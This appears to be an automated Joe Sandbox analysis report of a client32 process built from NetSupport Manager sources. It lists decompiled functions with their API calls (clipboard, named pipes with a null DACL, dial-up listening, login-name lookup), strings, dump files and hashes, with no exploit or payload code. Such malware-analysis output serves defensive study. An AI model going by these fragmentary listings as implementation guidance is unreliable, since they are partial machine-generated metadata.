pSlash, xrefs: 1102D3C4
hg, xrefs: 1102D3BA
Stop tracing, almost terminated, xrefs: 1102D4E8
delete gMain.ev, xrefs: 1102D242
Error %s unloading audiocap dll, xrefs: 1102D2F6
*.*, xrefs: 1102D3D3

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$File_free$AttributesDeleteEnterEventLeaveModuleNameObjectSingleWait
String ID: *.*$CLIENT32.CPP$Error %s unloading audiocap dll$Finished terminate$Stop tracing, almost terminated$delete gMain.ev$hg$pSlash
API String ID: 3417509300-1831769269
Opcode ID: 04d4b3f666e22ec4a8d2cb3c242804a9f746d37a3df8115d59c73d8d0b34a610
Instruction ID: 644e53087ecf41e8dc6bdf96785e57f0a5d4093e1a2e3be7ac375faac8544e6b
Opcode Fuzzy Hash: 04d4b3f666e22ec4a8d2cb3c242804a9f746d37a3df8115d59c73d8d0b34a610
Instruction Fuzzy Hash: 6B91F474E016229FE701DFE4CCC5FADB7A5AB8530CF5041B9DA1597288EB70B984CB62

Function 1106F200 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 358sleepCOMMON

Download Yara Rule

APIs

CapiHangup.PCICAPI ref: 1106F47F
CapiClose.PCICAPI ref: 1106F484
CapiOpen.PCICAPI(00000000,00000000), ref: 1106F48D
CapiListen.PCICAPI(00000001,00000000,00000000,00000000), ref: 1106F49B
GetTickCount.KERNEL32 ref: 1106F52A
GetTickCount.KERNEL32 ref: 1106F532
CapiHangup.PCICAPI ref: 1106F5BF
Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,000018BF,10000000), ref: 1106F5E9
GetTickCount.KERNEL32 ref: 1106F5EF
Sleep.KERNEL32(000003E8), ref: 1106F635

Strings

tapi, xrefs: 1106F4B3
$DB, xrefs: 1106F57C
..\ctl32\Connect.cpp, xrefs: 1106F4AE
Dialup, xrefs: 1106F478
*MSN, xrefs: 1106F473

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Capi$CountTick$HangupSleep$CloseListenOpen
String ID: $DB$*MSN$..\ctl32\Connect.cpp$Dialup$tapi
API String ID: 1585182496-2734021829
Opcode ID: a1bfeae140b9ea5eec6b7fc0c6ec204e8847b12d2fc883dc7bc0a054a569582f
Instruction ID: 3caf3c01b7fc6ee6abe901d80881ec7253840a1de47d47bcf81805af111e9df5
Opcode Fuzzy Hash: a1bfeae140b9ea5eec6b7fc0c6ec204e8847b12d2fc883dc7bc0a054a569582f
Instruction Fuzzy Hash: 89C10675E0021A9FE710DB74DC91B9DB3A8AF44318F5081B9E65D9B2C1DE71AE80CB92

Function 11025180 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 384windowtimeCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 11025317
DrawMenuBar.USER32(?), ref: 1102532E
GetMenu.USER32(?), ref: 11025383
DeleteMenu.USER32(00000000,00000001,00000400), ref: 11025391
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 110252EE

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

UpdateWindow.USER32(?), ref: 110253D7
IsIconic.USER32(?), ref: 110253EA
SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102540A
KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 11025470

Strings

m_hWnd, xrefs: 110253C6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110253C1
Chat, xrefs: 110251A8
..\ctl32\chatw.cpp, xrefs: 110251DA

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3085788722-363603473
Opcode ID: 8d184319dbef485588204d461dbf53b6f5c24501da0bcfac5578675ebcf06f93
Instruction ID: 3dddb363893b2c3b3c20fd1aaa85f6df2e008fd10312b2247e7433f8aa0d4f0d
Opcode Fuzzy Hash: 8d184319dbef485588204d461dbf53b6f5c24501da0bcfac5578675ebcf06f93
Instruction Fuzzy Hash: 93D1BC74B40702ABEB10DB64CC95FAEB3A5BF88708F104518F6129B3C1DAB6F941CB95

Function 1103B170 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 189COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1103B256
_free.LIBCMT ref: 1103B350

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

Part of subcall function 110CC930: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110CC9B5
Part of subcall function 110CC930: LoadResource.KERNEL32(00000000,00000000), ref: 110CC9E4
Part of subcall function 110CC930: LockResource.KERNEL32(00000000), ref: 110CCA08
Part of subcall function 110CC930: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A989,110CACA0,00000000), ref: 110CCA39
Part of subcall function 110CC930: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A989,110CACA0,00000000), ref: 110CCA54
Part of subcall function 110CC930: GetLastError.KERNEL32 ref: 110CCA79

_calloc.LIBCMT ref: 1103B365
_free.LIBCMT ref: 1103B3A0

Strings

DoUserLogin, xrefs: 1103B19E
Not logged in!, xrefs: 1103B2B5
GetName, xrefs: 1103B1E6
Get login name. Check if logged in, xrefs: 1103B27E
CLTCONN.CPP, xrefs: 1103B269, 1103B378
u, xrefs: 1103B1B6
, xrefs: 1103B2EA
Login name %s, xrefs: 1103B319

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_malloc_memsetwsprintf
String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
API String ID: 2195741704-1552251038
Opcode ID: 0462a9b570bd731b91fbeb35973cc5843bd19ecc72b602ef633cde8f93234f2a
Instruction ID: 71d1f455c920dbce3c56901a9ae18676288f8ce277f8d36e9842caba20dc6d47
Opcode Fuzzy Hash: 0462a9b570bd731b91fbeb35973cc5843bd19ecc72b602ef633cde8f93234f2a
Instruction Fuzzy Hash: E961D374E51A26AFE700DFA0DCC1FADF3A4AF8470DF104269E9255B2C0EB71A940C792

Function 110F1070 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F107C
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F10A5
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F10B2
CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F10E3
GetLastError.KERNEL32 ref: 110F10F0
Sleep.KERNEL32(000003E8), ref: 110F110F
CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F112E
LocalFree.KERNEL32(?), ref: 110F113F

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

CreateNamedPipe %s failed, error %d, xrefs: 110F10F8
e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F1090
pSD, xrefs: 110F1095

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
API String ID: 3134831419-838605531
Opcode ID: 1a59abb48870eaa2c0ba82d72753d86bbeb346e76cbcd32f42cd91c8e312ecda
Instruction ID: 752bcfdc7bfa2ce5ac112ecb1aa52883818b2e2afa73f6025012818006a920aa
Opcode Fuzzy Hash: 1a59abb48870eaa2c0ba82d72753d86bbeb346e76cbcd32f42cd91c8e312ecda
Instruction Fuzzy Hash: C321C575E40326BBE7219B54CC8AFAEBB7CEB48B19F004215FF25A71C0D6B1190187A1

Function 1115B090 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 440COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 1115B0D6
RemovePropA.USER32(?), ref: 1115B0F5
RemovePropA.USER32(?), ref: 1115B104
RemovePropA.USER32(?,00000000), ref: 1115B113

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B46A

Strings

old_wndproc, xrefs: 1115B0AD
..\ctl32\wndclass.cpp, xrefs: 1115B0A8

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
String ID: ..\ctl32\wndclass.cpp$old_wndproc
API String ID: 1777853711-3305400014
Opcode ID: 24bccf16e5b8e6f81f3d1228e7bc0ff3a9f777b6ad933c1d48d4292fd1923261
Instruction ID: 6b2710322754dfe427144b4c390b11e4b235df56b16200b5652f122aecd5176b
Opcode Fuzzy Hash: 24bccf16e5b8e6f81f3d1228e7bc0ff3a9f777b6ad933c1d48d4292fd1923261
Instruction Fuzzy Hash: D3C16CB53041199FD748CE69E890E7BB3EAFBC9311B10466EF956C3781DA31AC118BB1

Function 1101F350 Relevance: 15.1, APIs: 10, Instructions: 54clipboardmemorywindowCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 1101F377
GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F387
GlobalLock.KERNEL32(00000000), ref: 1101F390
_memmove.LIBCMT ref: 1101F399
GlobalUnlock.KERNEL32(00000000), ref: 1101F3A2
EmptyClipboard.USER32 ref: 1101F3A8
SetClipboardData.USER32(00000001,00000000), ref: 1101F3B1
GlobalFree.KERNEL32(00000000), ref: 1101F3BC
MessageBeep.USER32(00000030), ref: 1101F3C4
CloseClipboard.USER32 ref: 1101F3CA

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
String ID:
API String ID: 3255624709-0
Opcode ID: c9582f979c3e265c988eec42c23ee56e629289ee2f29a5aa3fd2d39dc3f2683e
Instruction ID: 0d0df8d60200a9d3f7e537871dcc52709318cdb71fa4a94b60cc676f4ed87b65
Opcode Fuzzy Hash: c9582f979c3e265c988eec42c23ee56e629289ee2f29a5aa3fd2d39dc3f2683e
Instruction Fuzzy Hash: 7801B5769011236BE3026BB48C8CE6FBBACDF9535D704C07AF626C6109EBB4C8058763

Function 11157550 Relevance: 13.6, APIs: 9, Instructions: 125windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1113F170: _memset.LIBCMT ref: 1113F199
Part of subcall function 1113F170: GetVersionExA.KERNEL32(?), ref: 1113F1B2

_memset.LIBCMT ref: 111575E6
SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115761C
ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115762C
GetDesktopWindow.USER32 ref: 11157689
TileWindows.USER32(00000000,?,?,?,?), ref: 11157690

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
String ID:
API String ID: 2935161463-0
Opcode ID: 44d54990b038820ab7aca28a4c3db93f33c937f37789f986b02d6a214ecffddf
Instruction ID: 35b7b6022d84591d044a26b694642ad0dc219aa576d7b98394625e4548749f3d
Opcode Fuzzy Hash: 44d54990b038820ab7aca28a4c3db93f33c937f37789f986b02d6a214ecffddf
Instruction Fuzzy Hash: DB411D75A00611ABFB408F58CDC6F6EFBB8EF46314F508065EA15EB280D774E900CBA6

Function 11157150 Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 111571F7
ShowWindow.USER32(?,00000009), ref: 11157207
BringWindowToTop.USER32(?), ref: 11157211
IsWindow.USER32(00000000), ref: 11157250
IsIconic.USER32(00000000), ref: 1115725B
ShowWindow.USER32(00000000,00000009), ref: 11157268
BringWindowToTop.USER32(00000000), ref: 1115726F

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$BringIconicShow
String ID:
API String ID: 2588442158-0
Opcode ID: 04339d3fb1edccea6c933904a73c1ecc4457608c31de8596ba7e9b6b00db6c2d
Instruction ID: 2670ec832e92eb258b7983cc8279a8fc572c95be5cb6928d22fcebd5cae773e0
Opcode Fuzzy Hash: 04339d3fb1edccea6c933904a73c1ecc4457608c31de8596ba7e9b6b00db6c2d
Instruction Fuzzy Hash: 8531A275A00A2A9FD751CF64D945BAEF7B4FB49714F00826AF921D3380EB35A901CFA1

Function 110255D0 Relevance: 4.6, APIs: 3, Instructions: 72windowthreadCOMMON

Download Yara Rule

APIs

IsIconic.USER32(00000000), ref: 11025606
BringWindowToTop.USER32(00000000), ref: 1102561C

Part of subcall function 110016C0: CloseHandle.KERNEL32(00000000,00000000,00000001,00000000), ref: 11001744

GetCurrentThreadId.KERNEL32 ref: 11025643

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
